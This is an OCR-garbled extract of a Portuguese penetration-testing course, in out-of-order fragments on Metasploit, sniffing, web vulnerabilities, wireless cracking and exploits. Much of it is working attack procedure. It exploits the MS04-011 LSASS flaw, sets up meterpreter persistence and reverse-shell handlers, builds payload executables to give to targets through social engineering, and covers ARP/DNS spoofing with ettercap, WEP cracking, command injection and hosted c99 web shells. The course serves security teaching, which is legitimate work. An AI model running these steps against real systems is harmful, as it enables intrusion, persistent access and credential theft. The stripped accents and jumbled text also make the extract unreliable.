80. Automatic Targetting 1 Windows 2000 English 2 Windows XP English Basic options Name Current Setting Required Description RHOST yes The target address RPORT 445 yes Set the SMB service port Payload information Space 1024 Avoid 7 characters Description This module exploits a stack overflow in the LSASS service this vulnerability was originally found by eEye When re exploiting a Windows XP system you will need need to run this module twice DCERPC request fragmentation can be performed by setting FragSize parameter References http www securityfocus com bid 10108 http cve mitre org cgi bin cvename cgi name 2003 0533 http www osvdb org 5248 http www microsoft com technet security bulletin MS04 011 mspx http milwOrm com metasploit 36 Cap tulo 19 Metasploit Framework 226 Essas informa es exibidas sobre o exploit s o muito importantes para sabermos como ele funciona e qual a utilidade dele pesquisando dessa forma que definiremos qual o melhor exploit para utilizarmos contra um determinado alvo Para utilizar esse exploit por exemplo digite no prompt msf gt use Windows smb ms04 011 Isass O prompt msf gt automaticamente muda para msf exploit ms04 011 Isass gt mostrando que o exploit foi selecionado e esta pronto para uso Agora vamos ver que tipo de alvo pode ser afetado por esse exploit Basta digitar show targets no prompt msf gt Sera exibida a seguin
81. Cap tulo 1 Introdu o Seguran a da Informa o 12 Cap tulo 1 Introdu o Seguran a da Informa o 1 1 Objetivos e Fornecer ao aluno uma vis o geral sobre seguran a da informa o e Entender a import ncia da seguran a da informa o no mundo de hoje e Conhecer as principais amea as e Compreender a terminologia b sica utilizada e Conhecer algumas certifica es da rea Cap tulo 1 Introdu o Seguran a da Informa o 13 1 2 O que seguran a Segundo o dicion rio da Wikip dia seguran a um substantivo feminino que significa e Condi o ou estado de estar seguro ou protegido e Capacidade de manter seguro Prote o contra a fuga ou escape e Profissional ou servi o respons vel pela guarda e prote o de algo Confian a em si mesmo Dentro do escopo com rela o ao que iremos estudar os tr s primeiros t picos adequam se perfeitamente ao que ser abordado ao longo do curso No entanto veremos esses aspectos na vis o do atacante aquele que tem por objetivo justamente subverter a seguran a E o que queremos proteger Vamos analisar o contexto atual em primeiro lugar Na poca em que os nobres viviam em castelos e possu am feudos com m o de obra que trabalhavam por eles entregando lhes a maior parte de sua produ o e ainda pagavam extorsivos importos qual era o maior bem que possu am Terras Isso mesmo quem tinha maior n mero de terras era m
82. Capture duration 115 000000 seconds Start time Sat Feb 20 16 38 25 2010 End time Sat Feb 20 16 40 20 2010 Data rate 15109 01 bytes s Data rate 120872 07 bits s Average ra size 614 40 bytes Vamos analisar o arquivo sniffer cap com a ferramenta Wireshark Basta abrir o Wireshark e ir em File gt Open e apontar para o arquivo sniffer cap 19 12 4 Mantendo o acesso E se a pessoa reiniciar ou at mesmo desligar a m quina destino Para isso existe um script meterpreter que nos ajudar fazer o que queremos seu nome persistence Para que possamos manter o acesso com a m quina alvo precisamos executar o seguinte comando no console meterpreter gt run persistence X O comando acima criar um arquivo execut vel na maquina destino a op o X serve para que o arquivo criado seja executado durante o boot da m quina destino vejam onboot true Repare na sa da do comando o endere o IP local da m quina do atacante e que ela escutar na porta 4444 que a padr o podemos alterar a porta padr o para outra que nos convenha usando a op o p seguido do n mero da porta exemplo p 5555 Para testarmos feche a janela do console msf e abra a novamente vamos configurar o exploit multi handler para ficar aguardando pela conex o Cap tulo 19 Metasploit Framework 236 gt use exploit multi handler gt set PAYLOAD windows meterpreter reverse tcp gt set LHOST 192 168 0
83. HP de alta interatividade apenas a experi ncia e o conhecimento dessas armadilhas podem permitir ao pen tester descobrir e detectar essas armadilhas para invasores No entanto n o aconselho perder muito tempo tentando detectar honeypots e definir se um servidor que est tentando explorar um HP ou n o Deixe que isso seja consequ ncia de seu trabalho e n o o objetivo principal Tr s timas ferramentas que podem ser utilizadas na detec o de honeypots e Nmap e Nessus e OpenVAS 11 5 Pr tica dirigida Varredura com Spoofing e Decoy nmap S 192 168 0 1 p 22 O sV PO n 192 168 200 1 nmap SS source port 55 p 80 PO n D 192 168 0 24 192 168 0 25 192 168 200 x 1 Realizar essas varreduras nos micros vizinhos com o wireshark rodando 2 Descobrir na rede qual o IP onde h um honeypot sendo executado 11 6 Contramedidas e Manter regras de firewall e IDS muito bem configuradas e Manter a aten o constante em logs de equipamentos que s o respons veis pela prote o da rede e N o confiar em apenas um firewall ou IDS compartimentalizando a rede Cap tulo 11 Ignorando Prote es 133 Cap tulo 12 T cnicas de For a Bruta 12 1 Objetivos e Conhecer os mecanismos de gera o de wordlist e Conhecer ferramentas de bruteforce e Entender o que boa pol tica de senhas Cap tulo 12 T cnicas de For a Bruta 134 12 2 Brute Force Uma das mais conhecidas t cn
84. L Access Insufficient Transport Layer Protection Unvalidated Redirects and Forwards 13 4 1 Command Injection Falhas dessa classe ocorrem simplesmente porque o programador nao filtrou o conte do que recebe de um usu rio e envia para fun es que executam comandos no sistema como por exemplo a fun o system ou passthru do PHP Uma vez que um usu rio malicioso consegue enviar caracteres de escape gt lt e esses caracteres s o enviados para a aplica o vulner vel o atacante conseguir executar os comandos diretamente no servidor Exemplo Cap tulo 13 Vulnerabilidades em aplica es web 159 w http www hostvuln com meuscript cgi file id uname 20 a No exemplo acima o atacante est executando os comandos id e uname a no servidor vulner vel 13 4 2 Command Inject Shell PHP Um dos mais famosos shell em php o C99 criada pelo Captain Crunch Security Team mas existem diversas r57 php shell R9 etc A c99 a mais usada pela sua simplicidade sem muitos conhecimentos de comandos unix Podemos conseguir uma shell baixando um arquivo php com o c digo da mesma e hospedando a em um site Ou simplesmente buscando na web Dois exemplos de sites que possuem shells s o w http corz org corz c99 php http www c99shell com A partir de um site vulner vel podemos chamar a shell que esta hospedada em um site e simplesmente come ar a operar dentro
85. S ana AOC TONA A CATE Ar vam 1592 36 A 34 rom AANA IPEA Far b b Frame 14758 546 bytes on wire 546 bytes captured C v Ethernet II Src 00 e0 7d b9 69 70 Dst 00 08 0d 1f 85 0b Destination 00 08 0d 1f 85 0b Toshiba 1f 85 0b a Source 00 e0 7d b9 69 70 Netronix b9 69 70 bi 45 E 0010 02 14 3b 04 40 00 2e 06 77 37 40 Of ce 8b 87 99 w7 0020 02 75 23 28 06 d6 fb f2 ba 8a 96 28 ea 42 50 18 UM BP 0030 81 60 71 f2 00 00 78 ca 14 30 bO c6 47 d6 43 ac O eee mie a 0040 na hp eng e6 00 00 la rag ca 4a RO RT 2 pe Fiype ethtype 2 bytes 7 COCE Tes 2 EE P 184730 BaMO 7 18473 D 18473 P 18473D 18473M 0 J 0 Cap tulo 15 T cnicas de Sniffing 186 15 7 DNS Pharming Em inform tica Pharming o termo atribu do ao ataque baseado na t cnica DNS cache poisoning que consiste em corromper o DNS em uma rede de computadores fazendo com que a URL de um site passe a apontar para um servidor diferente do original Ao digitar a URL do site que deseja acessar um banco por exemplo o servidor DNS converte o endere o em um n mero IP correspondente ao do servidor do banco Se o servidor DNS estiver vulner vel a um ataque de Pharming o endere o poder apontar para uma p gina falsa hospedada em outro servidor com outro endere o IP que esteja sob controle do atacante Links e hitp www technicalinfo net papers Pharming html e http www technicalinfo net pape
86. Tamb m possui diversos filtros capaz de interpretar dados de diversos protocolos Para execut lo basta seguir o comando abaixo E dsniff i eth0 15 6 2 Ettercap Extremamente famoso no mundo do hacking esse sniffer capaz de capturar trafego em switch por possuir t cnicas arp spoof Al m disso a ferramenta composta por diversos plugins que possibilitam identificar m quina encontrar portas abertas e finalizar conex es ativas al m de capturar sess es de protocolos como telnet a ettercap Tq M ARP cd usr local share ettercap vi etter dns ettercap Tq M ARP P dns spoof Os comandos acima realizam ARP Spoof entre todos os hosts da rede e o segundo comando realiza al m de fazer o ARP Spoof faz tamb m o DNS Spoof Por m podemos executar apenas o comando ettercap Nesse caso Cap tulo 15 T cnicas de Sniffing 184 necess rio explicitar uma origem e um destino para que o sniffer possa comece a atuar Depois de realizado esse passo basta esperar pela captura de senhas Caso deseje conhecer as funcionalidades dos plug ins bastar apertar a tecla p em cima de uma conex o 15 6 3 TCPDump O tcpdump um dos mais se n o o mais famoso sniffer para sistemas GNU Linux Com ele podemos realizar an lises de redes e solucionar problemas Sua utiliza o simples e sem mist rios bastando apenas ter os conhecimentos b sicos de
87. WEP As informa es que trafegam em uma rede wireless podem ser criptografadas O protocolo WEP Wired Equivalent Privacy aplica criptografia avan ada ao sinal e verifica os dados com uma chave de seguran a eletr nica Por m a Universidade de Berkeley revelou a possibilidade de alguns tipos de ataques que exploram falhas no algoritmo WEP Baseados em an lises que exploram fraquezas do algoritmo RC4 uma senha WEP pode ser descoberta Humphrey Cheung escreveu o artigo How To Crack WEP descrevendo passo a passo como descobrir a senha do protocolo WEP O artigo pode ser obtido na url http www isaac cs berkeley edu isaac wep faq html Ap s a publica o do artigo surgiram algumas ferramentas que exploravam o problema descrito no mesmo Um exemplo de ferramenta o aircrack O aircrack um conjunto de ferramenta bastante poderoso e amplamente usado para realizar ataques a redes sem fio Vamos ver um passo a passo de uso do programa para descobrir uma chave wep Em primeiro lugar vamos fazer uma varredura para ver as redes WiFi existentes no ambiente 3 iwlist scan Colocando a interface wireless em modo monitor airmon ng start wlan0 q Iniciando a captura dos pacotes 4 airodump ng ivs w wep c canal da rede mon0 Onde c Canal Cap tulo 17 Ataques a Redes Sem Fio 200 Point w Prefixo do arquivo a ser salvo i Capturar ape
88. ZZ E smtp f E ssh p Reel X Ce ay 192 168 1 204 Console X scanner smb smb_version X scanner portscan tcp X Services X Credentials X Meterpreter1 X user 4 pass host Administrator 81 cbcea8a9af93bbaad3b435b51404ee 561 192 168 1 201 Guest aad3b435b51404eeaad3b435b51404ee 31 192 168 1 201 HelpAssistant 9a6ae26408b0629ddc621c90c897b42d 07a 192 168 1 201 SUPPORT_388945a0 aad3b435b51404eeaad3b435b51404ee ebf 192 168 1 201 victim 8lcbcea8a9af93bbaad3b435b51404ee 561 192 168 1 201 Como podemos ver o Armitage nos proporciona uma excelente interface para o Metasploit que pode nos economizar muito tempo em alguns casos E poss vel encontrar mais informa es em seu site http www fastandeasyhacking com media Cap tulo 19 Metasploit Framework 253 19 14 Wmap web scanner WMAP um scanner de vulnerabilidades web que foi criado originalmente a partir de uma ferramenta chamada SQLMap Esta ferramenta integrada com o Metasploit e nos permite conduzir a varredura de aplica es web a partir do Framework 19 14 1 Configurando o WMap Primeiro precisamos criar um novo banco de dados para armazenar os resultados da varredura carregar o plgin wmap e executar o help para ver quais novos comandos est o dispon veis para n s mysql u root p gt create database wmap gt quit cd pentest exploits framework3 msfconsole msf gt db_dri
89. a es e O que cookie Cookies s o arquivos de texto que cont m dados enviados pelo servidor Quando precisamos deixar informa es gravadas no computador da pessoa que est visualizando o site usamos os cookies Por exemplo um site de vendas quer deixar as informa es dos produtos que uma pessoa visualizou toda vez que ela entrar no site Para que isso ocorra na primeira vez que esta pessoa entrar no site O servidor guardar as informa es dos produtos que ela olhou em um arquivo de texto um cookie que fica armazenado em uma pasta tempor ria no computador dela Assim da pr xima vez que ela entrar nesse site o servidor ir ler esse arquivo para listar os produtos e Como fazer um ataque sess o gt Session Hijacking e Atrav s de falhas de XSS e Atrav s de Sniffer de rede local e Atrav s de cookies armazenados gt Session Fixation e N o necess rio estar logado Cap tulo 13 Vulnerabilidades em aplica es web 166 e Gera se uma sess o para o usu rio e Espera se ele autenticar e utiliza se a sess o j conhecida e Solu o e N o utilize cookies e Nunca armazene informa es que n o podem ser modificadas gt admin false gt logado false gt userid 1001 e Nunca utilizem algoritmos pr prios de gera o de tokens de cookie e Prote o contra Sequestro de Sess o por XSS e A falha n o est na sess o e Tokens em formul rios HttpOnly e Utilizar criptografia http
90. acesso ilegal ao computador vulner vel Mesmo software considerado seguro como o OpenSSH j apresentou o problema e tamb m softwares famosos como o Sendmail e m dulos do Apache Buffer overflows s o tamb m chamados de buffer overruns e existem diversos Cap tulo 18 Exploits 211 tipos de ataques de estouro de buffer entre eles stack smashing attacks ataques contra buffers que se encontram na pilha vou cham la de stack e heap smashing attacks que s o ataques contra buffers que se encontram na heap Tecnicamente um buffer overflow um problema com a l gica interna do programa mas a explora o dessa falha pode levar a s rios preju zos como por exemplo o primeiro grande incidente de seguran a da Internet o Morris Worm em 1988 utilizava t cnicas de estouro de buffer num programa conhecido como fingerd O objetivo de uma explora o contra um programa privilegiado vulner vel a buffer overflow conseguir acesso de tal forma que o atacante consiga controlar o programa atacado e se o programa possuir privil gios suficientes ou seja se ele possui flag suid root controlar a m quina Abaixo temos um pequeno programa vulner vel que permitir que fa amos uma prova de conceito E l include lt stdio h gt main char name char dangerous_system command name char malloc 10 dangerous system command char malloc 128 printf Address of name is d n name printf
91. add conn policy a m d add mod del conn policy entry conn List properties mac n seq n suggest mac base EA 1A DE AD BE 60 host resolving n t arp req spoof through req reset ACK storm timeout 4s w switched environment simple hijack cmd timeout 2s y arp spoof with my mac arp req rep packets 2 e learn MAC from IP traffic number of lines per page 5 v verbose print cntrl chars y Dentro dessa tela utilizaremos a op o a m d add mod del conn policy entry onde vamos definir as regras de conex o ou seja vamos configurar aqui o que o hunt farejar Por hora vamos utilizar a op o a para fazer a configura o necess ria O hunt pedir a partir de qual endere o voc deseja sniffar as conex es a origem dos pacotes E logo depois o endere o de destino dos pacotes que deseja capturar com o hunt Configure corretamente informando o IP de origem e de destino dos pacotes que deseja capturar Se deixarmos no IP de origem o endere o 0 0 0 0 0 ele vai capturar os pacotes vindos de qualquer lugar da rede para o IP de destino configurado Na terceira ele pedir um INSERT AT apenas tecle enter deixando a op o padr o Essa op o simplesmente para definir em qual posi o da lista nossa regra aparecer Depois disso digitamos x para voltarmos ao menu principal Cap tulo 9 Testando o sistema 115 Digitamos L para listar as conex es ativas importante que aguardemos um
92. ados etc e Slacker Usado para esconder arquivos em parti es NTFS e Sam Juicer Um m dulo do Meterpreter usado pra extrair hashes dos arquivos SAM sem acessar o disco r gido e Transmogrify Ferramenta usada pra passar pelo EnCases file signaturing e Social Engineering Toolkit O Social Engineering Toolkit SET foi desenvolvido por David Kennedy ReL1K e incorpora muitos ataques teis de engenharia social todos em uma interface simples O principal objetivo do SET automatizar e melhorar muitos dos ataques de engenharia social a partir dele 19 7 Tecnologia do Meterpreter Payload A fase chamada p s explora o foi significantemente melhorada na vers o tr s Um dos principais payloads do MSF o Meterpreter O Meterpreter tenta ser invis vel ao sistema atacado Para ilustrar vamos ao exemplo de problemas Host Intrusion Detection Systems podem soar um alarme assim que voc digitar seu primeiro comando no shell ou mesmo deixar rastros para que o perito forense descubra o que foi feito durante o ataque Cap tulo 19 Metasploit Framework 221 O meterpreter supera as limita es e fornece v rias APIs que permitem ao atacante executar diversos ataques de explora o no shell meterpreter podendo ir mais a fundo e descobrindo o m ximo poss vel de informa es do alvo e da rede interna O Meterpreter proporciona uma enorme flexibilidade para o processo de p s explora o deixando o at escrever
93. ais conhecidas para descoberta de vulnerabilidades em redes e sistemas Com um conjunto sempre atualizado de plugins baseado em sua linguagem de script chamada NASL ele faz a varredura de todo os IPs definidos em sua configura o buscando vulnerabilidades e brechas na configura o dos servi os informando os em um relat rio final onde define o grau de risco das vulnerabilidades encontradas Inicialmente o Nessus era um software opensource mas a partir da vers o 3 0 passou a ser uma ferramenta comercial dispon vel gratuitamente apenas para uso dom stico Portanto poss vel baixar gratuitamente o Nessus em seu site www nessus org e registrar se para conseguir a chave de ativa o para poder utilizar a ferramenta em testes particulares Vamos ver no t pico a seguir como baixar e configurar o Nessus para sua utiliza o em an lise de vulnerabilidades 8 7 Pr tica dirigida 8 7 1 Instalando o Nessus 1 Acesse o endere o nessus org download 2 Baixe a vers o 4 2 2 do Nessus para Ubuntu 8 04 Cap tulo 8 Enumera o de informa es e servi os 98 3 Instale o pacote dpkg i Nessus 4 2 2 debian5 i386 deb o 4 Adicione um usu rio que ser o administrador do Nessus E opt nessus sbin nessus adduser 8 7 2 Registrando e iniciando 1 Acesse www nessus org register 2 Escolha a vers o Professional ou Home a vers o Home gratuita 3 Informe um endere
94. ais poderoso e possu a mais riqueza Posto que quanto mais terras maior a produ o recebida das m os dos camponeses que arrendavam as terras de seu suserano Ap s alguns s culos com o surgimento da Revolu o Industrial esse panorama muda completamente Os camponeses deixam os campos e passam a trabalhar nas f bricas transformando se em oper rios Quem nunca viu o filme Tempos Modernos de Chaplin Chaplin ilustra muito bem como era a rotina desses oper rios Nessa fase da hist ria da civiliza o o maior ativo a m o de obra Cap tulo 1 Introdu o Seguran a da Informa o 14 juntamente com o capital Quem tinha o maior n mero de oper rios trabalhando incansavelmente detinha o poder pois possu a maior capital gerado pela produ o incessante das ind strias No entanto como tudo o que c clico e est em constante mudan a o cen rio mundial novamente se altera inicialmente com o movimento iluminista O Iluminismo a partir do s culo XVIII permeando a Revolu o Industrial prepara o terreno para a mudan a de paradigma que est por vir Os grandes intelectuais desse movimento tinham como ideal a extens o dos princ pios do conhecimento cr tico a todos os campos do mundo humano Supunham poder contribuir para o progresso da humanidade e para a supera o dos res duos de tirania e supersti o que creditavam ao legado da Idade M dia A maior parte dos iluministas
95. ais v Google 4linux Pesquisar Aproximadamente 36 100 resultados 0 26 segundos Pesquisa avan ada 8 Tudo 4Linux Linux Software Livre Cursos Treinamento Consultoria 77 Mais A 4Linux oferece cursos de Linux EaD consultoria em software livre al m de suporte e desenvolvimento com equipe 24x7 em todo Brasil www 4linux com br Em cache Similares A Web Cursos Cursos com padr o IBM de qualidade P ginas em Fale Conosco Metodologia de Ensino dist ncia portugu s Empresa Consultoria P ginas de Brasil Participe das promo es da 4Linux Eventos Mais ferramentas Mais resultados de 4linux com br Esse recurso permite que tenhamos acesso s p ginas que j foram tiradas do ar desde que ainda existam na base de dados do Google Vamos imaginar que em algum momento da hist ria do site de uma organiza o uma informa o mais sens vel estivesse dispon vel Depois de um tempo o webmaster tendo sido alertado retirou tal informa o do site No entanto se a p gina do site j tiver sido indexada pelo Google poss vel que mesmo tendo sido alterada ou retirada ainda possamos acess la utilizando o recurso de cache do Google Cap tulo 4 Google Hacking 47 4 3 Comandos Avan ados do Google 4 3 1 intitle allintitle Busca conte do no t tulo tag title da p gina Quando utilizamos o comando intitle importante prestar aten o sintaxe da string de busca posto que a
96. all java package root bt apt get install armitage Unpacking armitage from armitage 0 1 btO i386 deb Setting up armitage 0 1 bt0 O Armitage comunica se com o Metasploit atrav s do daemon RPC entao precisamos inicia lo B root bt msfrpcd f U msf P test t Basic XMLRPC starting on 0 0 0 0 55553 SSL Basic A pr xima coisa se fazer iniciar o Mysql Server para que o Armitage possa armazenar os resultados root bt etc init d mysql start Starting MySQL database server mysqld Checking for corrupt not cleanly closed and upgrade needing tables root bt Por ultimo executamos o armitage sh a partir da pasta pentest exploit armitage e poderemos visualizar a caixa de dia logo de conexao No Backtrack as credenciais default para o MySQL s o root toor e para o PostgresSQL postgres toor x root bt cd pentest exploits armitage root bt pentest exploits armitage armitage sh Cap tulo 19 Metasploit Framework 246 4 Use SSL User Pass test DB Driver mysql v DB Connect String root toor 127 0 0 1 msf3 Connect Start MSF Exit Selecionamos a op o Use SSL verificamos os restante das configura es e clicamos em Connect Ap s isso a janela principal do Armitage exibida Armitage View Hosts Attacks Workspaces Help gt E auxiliary exploit gt payload Console X
97. alvo por meio da leitura de seus respectivos banners que s o aquelas mensagens que cont m informa es como o tipo do servi o sua vers o etc Essas informa es visam estabelecer um levantamento dos servi os utilizados onde o foco de um poss vel ataque pode estar voltado para a explora o de vulnerabilidades desses servi os 8 3 1 T cnicas cl ssicas Sem utilizar ferramentas espec ficas poss vel conseguir informa es dos servi os que est o sendo executados em determinada porta Abaixo veremos dois exemplos utilizando ftp e telnet Obtendo banner de um servidor ftp Cap tulo 8 Enumera o de informa es e servi os 93 3 l ftp 192 168 200 254 Obtendo banner de um servidor de e mail telnet 192 168 200 205 25 HELO dominio MAIL FROM endere o origem RCPT TO endere o destino DATA msg quit Com o comando telnet podemos tentar conectar em todas as portas existentes para verificar o que est sendo executado Obviamente que esse um m todo lento e imposs vel de ser executado nas mais de 65000 portas existentes mas interessante conhec lo e ainda evita a detec o por IDS ou firewall 8 3 2 Ferramentas e Nmap Realiza varredura de rede buscando hosts ativos portas abertas e servi os sendo executados e Xprobe2 Analisa banners de sistemas operacionais comparando com um banco de dados interno onde compara os e in
98. alvos Normalmente aplica es que possuem suidroot s o as mais exploradas al m do pr prio kernel do sistema que executado com privil gios de super usu rio Aplica es com suidroot uma aplica o com uma permiss o especial conhecida por suid bit s que quando executada ser executada com privil gios do usu rio root Portanto se conseguirmos explorar um arquivo que possui esse tipo de permiss o provavelmente conseguiremos obter os privil gios do usu rio root no sistema conseguindo assim controle total Para procurarmos por arquivos com suidroot na m quina podemos executar o comando abaixo E amp find perm 4000 gt suidroot txt less suidroot txt find perm 04000 exec ls l Al m de arquivos com suidroot tamb m podem ser exploradas falhas no kernel do sistema que quem cuida dos privil gios dos usu rios e conseq entemente ganharemos privil gios administrativos se a falha for explorada com sucesso Portanto ap s identificarmos os arquivos que possuem esse tipo especial de permiss o precisamos identificar falhas de seguran a nesses softwares Essas falhas podem ser p blicas ou seja que poss vel encontrar na internet ou privada que pode ser comprada de um pesquisador ou empresa ou at mesmo descoberta pelo pr prio atacante 14 4 Passo a passo 1 Obter acesso local ao sistema 2 Procurar poss veis alvos 3 Tentar explorar esses alvo
99. antiv rus que antes e comparar os resultados A partir da engenharia social pura onde deve usar a imagina o para convencer o alvo a executar o arquivo Aproveite um pouco de seu tempo para ler o seguinte E msfpayload h msfencode h msfencode l Cap tulo 19 Metasploit Framework 232 Ap s criar o exe codific lo para torn lo mais dificilmente detect vel por antiv rus e envi lo ao alvo precisamos colocar o metasploit para escutar espera da conex o 3 msf gt msfcli exploit multi handler PAYLOAD windows shell reverse tcp LHOST 192 168 0 110 LPORT 4455 E Ao ser executado o nosso arquivo no computador do alvo ser estabelecida uma conex o entre o atacante e o alvo Assim ganhamos nossa shell meterpreter Aparentemente parece que est travado mas n o est Repare que a sess o meterpreter j foi criada sendo assim pressionamos Ctrl C para finalizar este travamento Agora digite o comando E gt sessions 1 Temos uma sess o ativa com ID de n mero 1 identificando a Agora vamos interagir com o console meterpreter basta o comando s gt sessions i 1 Se o alvo abrir o gerenciador de tarefas no windows ver o processo de nosso execut vel clique aqui exe rodando o que pode gerar desconfian a Precisamos migra para um outro processo mais est vel e menos arriscado do usu rio i
100. ar metros desejados com a sintaxe Sintaxe tfn lt iplist gt lt type gt ip port Onde lt iplist gt a lista dos agentes que podem ser utilizados lt type gt o tipo de ataque desejado ip o endere o da v tima e port a porta desejada para ataques TCP SYN flooding que pode ser definida como um n mero aleat rio par metro 0 O TEN bastante discreto A comunica o entre os mestres e os agentes feita por mensagens ICMP tipo 0 o que torna dif cil o monitoramento dessas comunica es pois muitas ferramentas de monitoramento n o analisam o campo de dados de mensagens ICMP 9 5 Principais tipos de ataques 9 5 1 Ping Flood Ping flood um ataque de nega o de servi o simples no qual o atacante sobrecarrega o sistema v tima com pacotes ICMP Echo Request pacotes ping Este ataque apenas bem sucedido se o atacante possui mais largura de Cap tulo 9 Testando o sistema 109 banda que a vitima Como a vitima tentar responder aos pedidos ir consumir a sua largura de banda impossibilitando a responder a pedidos de outros utilizadores As nicas maneiras de proteger deste tipo de ataque limitando o tr fego do ping na sua totalidade ou apenas limitando o tr fego de pacotes ICMP Echo Request com um tamanho menos elevado 9 5 2 SYN Flood SYN flood ou ataque SYN uma forma de DoS em sistemas computadorizados na qual o atacante envia uma sequ ncia de requisi
101. ara limpar computadores de pessoas que estavam infectadas por outros worms nocivos 10 6 Netcat Netcat uma ferramenta usada para ler e escrever dados em conex es de rede usando o protocolo TCP IP Dada sua grande versatilidade o Netcat considerado pelos hackers o canivete su o do TCP IP podendo ser usado para fazer desde portscans at brute force attacks O nome netcat vem do comando cat do Linux Unix O cat concatena arquivos e envia para a sa da padr o stdout O netcat faz praticamente o mesmo por m ao inv s de concatenar arquivos o netcat concatena sockets TCP e UDP Possui in meras fun es dentre as quais e Varredura de portas Banner grabbing Cria o de backdoor e Tunelamento e etc Al m de facilitar a vida do administrador de rede tamb m facilita a vida de um invasor portanto cuidado Mate seu processo e remova o bin rio sempre ap s a Cap tulo 10 Trojans Backdoors V rus Rootkits e Worms 123 utiliza o caso n o queira tornar se a v tima 10 6 1 Op es do Netcat e comando Executa o comando especificado usando como entrada stdin os dados recebidos pela rede e enviando os dados de sa da stdout e stderr para a rede Essa op o somente estar presente se o nc for compilado com a op o GAPING SECURITY HOLE j que permite que usu rios disponibilizem programas para qualquer um conectado a rede i Especifica o intervalo de tempo no qual as l
102. ara outras pesquisas do Google que podem pertencer a este site O par metro informado este operador deve ser uma URL v lida 4 3 11 related Mostra sites relacionados O operador related exibe o que o Google determinou como relacionado a um determinado site O par metro para esse operador uma URL v lida poss vel conseguir essa mesma funcionalidade clicando no link Similar Pages a partir de qualquer p gina de resultados de busca ou usando o Find pages similar to the page da p gina do formul rio de pesquisa avan ada Yy Dica Se voc est realizando um pentest em um site chin s para que usar um google com br O Google prioriza os resultados para determinados websites Raramente voc v p ginas escritas em japon s chin s rabe e outros quando usa o google com br n o Uma boa busca feita em servidores diferentes com pa ses diferentes 4 4 Google Hacking Database H um banco de dados virtual com tags de busca no Google previamente criadas para conseguir informa es espec ficas A partir das tags existentes podemos encontrar muitas coisas interessantes sem precisarmos nos preocupar em como desenvolver buscas espec ficas utilizando os operadores do Google e test las at conseguirmos que os filtros corretos funcionem Mas o mais importante que devemos manter em mente a possibilidade e adaptar tais tags de busca para nossas necessidades Cap tulo 4 Google Ha
103. are os resultados de cada programa Cap tulo 8 Enumera o de informa es e servi os 95 B nmap sV O ip alvo Xprobe2 p TCP 80 open lt ip gt Amap lt ip gt lt porta gt 8 5 Mapeando graficamente a rede Os programas de linha de comando funcionam muito bem para varrer redes descobrir hosts ativos servi os sendo executados e vers es dos mesmos No entanto quando temos um mapa gr fico m o torna se muito mais f cil visualizarmos a estrutura da rede e definirmos os vetores de ataque de forma mais consistente Justamente por isso abordaremos nos t picos seguinte exemplos de ferramentas existentes no Backtrack 4 que permitem mapear a rede graficamente Algumas rodam em linha de comando como o Lanmap por exemplo e outras possuem uma interface gr fica que facilita a opera o como o Cheops e Maltego 8 5 1 Lanmap e Cheops Ex lanmap i eth0 r 30 T png o tmp Bs F8 44 0D 47 Symbol CRASHY Sag F8 44 0D WinXP SP2 10 43 97 6 0B DB 16 57 F3 Heil ESG Pcba Test 192 168 1 101 fe80 5efe 192 168 1 101 2 160 GE CP 96 0 3 MB jackets gs trike 66 22 6 MB 2 SIRA 0 SAUCE Router DHCP Sender C 6 1 ux 2 5 x 2 6 x 1 F6 E2 ED Linksys 00 03 47 92 D4 F3 Intel 192 168 1 1 192 168 1 100 Cap tulo 8 Enumera o de informa es e servi os 96 8 5 2 AutoScan U g i Harada A 2 0 Add andina View Swe Seach Settiegs Notions In
104. as operacionais e servidores Este framework deve ser utilizado com muita cautela e somente para fins ticos 19 3 O que Metasploit Framework Como mencionado em seu Website Metasploit Framework uma avan ada plataforma Open Source concebida especificamente com o objetivo de refor ar e Cap tulo 19 Metasploit Framework 213 acelerar o desenvolvimento ensaio e utiliza o de exploits O projeto relacionado a este Framework de acordo com seus criadores que nasceu como um jogo tem mostrado um crescimento espetacular em especial nos ltimos tempos na minha modesta opini o especificamente a partir da vers o 2 2 aspecto que lhe ajudou a conquistar um lugar privilegiado no mbito do kit de ferramentas de todo profissional relacionado de alguma forma ou de outra com as tecnologias de seguran a da informa o Escrito na maioria das vezes em Perl seu nico defeito de acordo com o parecer do n mero cada vez maior de amantes de Python e com v rios componentes desenvolvidos em C e Assembler sua portabilidade esta assegurada o que contribui em larga medida para a sua aceita o maci a porque qualquer que seja a sua escolha de plataforma de uso Like Unix BSD Mac X Windows etc pode instal lo e desfrutar todos os seus poderes em poucos minutos e sem grandes dificuldades Um aspecto interessante no que se refere concess o de licen as para as novas vers es do Metasploit Framework
105. associava ainda o ideal de conhecimento cr tico tarefa do melhoramento do estado e da sociedade E com isso come amos a ver atrav s de uma grande mudan a de paradigma que a deten o de informa es ou conhecimentos que tinham algum valor que define quem tem o poder nas m os ou n o E surge ent o a era da informa o Com esse acontecimento inicia se o surgimento da internet e a globaliza o possibilitando o compartilhamento em massa da informa o Nesse momento n o mais a m o de obra terras m quinas ou capital que regem a economia e dita quem tem o poder mas sim a informa o que se torna o principal ativo dessa era Estamos na era da informa o e nada mais l gico que um corpo de conhecimento fosse criado para dar a devida aten o s anomalias e proteger esse ativo t o importante Essa rea de atua o que j existia h muito anos mas agora com tarefas bem mais definidas com regras e normas a serem seguidas a Seguran a da Informa o ou SI 1 3 Seguran a da Informa o A Seguran a da Informa o tem como principal objetivo justamente proteger as informa es que s o os principais ativos atualmente que sejam importantes para uma organiza o ou indiv duo Cap tulo 1 Introdu o Seguran a da Informa o 15 Entendendo esse conceito n o suficiente apenas conhecer as normas existentes e as v rias formas poss veis de prote o mas necess rio
106. auto modific vel Os processos em execu o s o divididos em quatro regi es texto dados pilha e heap A pilha um bloco de mem ria cont guo utilizado para armazenar as vari veis locais passar par metros para fun es e armazenar os valores de retornos Cap tulo 18 Exploits 208 destas O endere o de base da pilha fixo e o acesso estrutura realizado por meio das instru es PUSH e POP implementadas pelo processador O registrador chamado ponteiro de pilha SP aponta para o topo da pilha A pilha consiste em uma sequ ncia de frames que s o colocados no topo quando uma fun o chamada e s o retirados ao final da execu o Um frame cont m os par metros para a fun o suas vari veis locais e os dados necess rios para recuperar o frame anterior incluindo o valor do ponteiro de instru o no momento da chamada de fun o Dependendo da implementa o a pilha pode crescer em dire o aos endere os altos ou baixos O ponteiro de pilha tamb m de implementa o dependente podendo apontar para o ltimo endere o ocupado na pilha ou para o pr ximo endere o livre Como o texto trata da arquitetura Intel x86 iremos utilizar uma pilha que cresce para os endere os baixos com o ponteiro de pilha registrador ESP apontando para o ltimo endere o da pilha Al m de um ponteiro de pilha tamb m conveniente contar com um ponteiro de frame FP que aponta para um endere o fixo
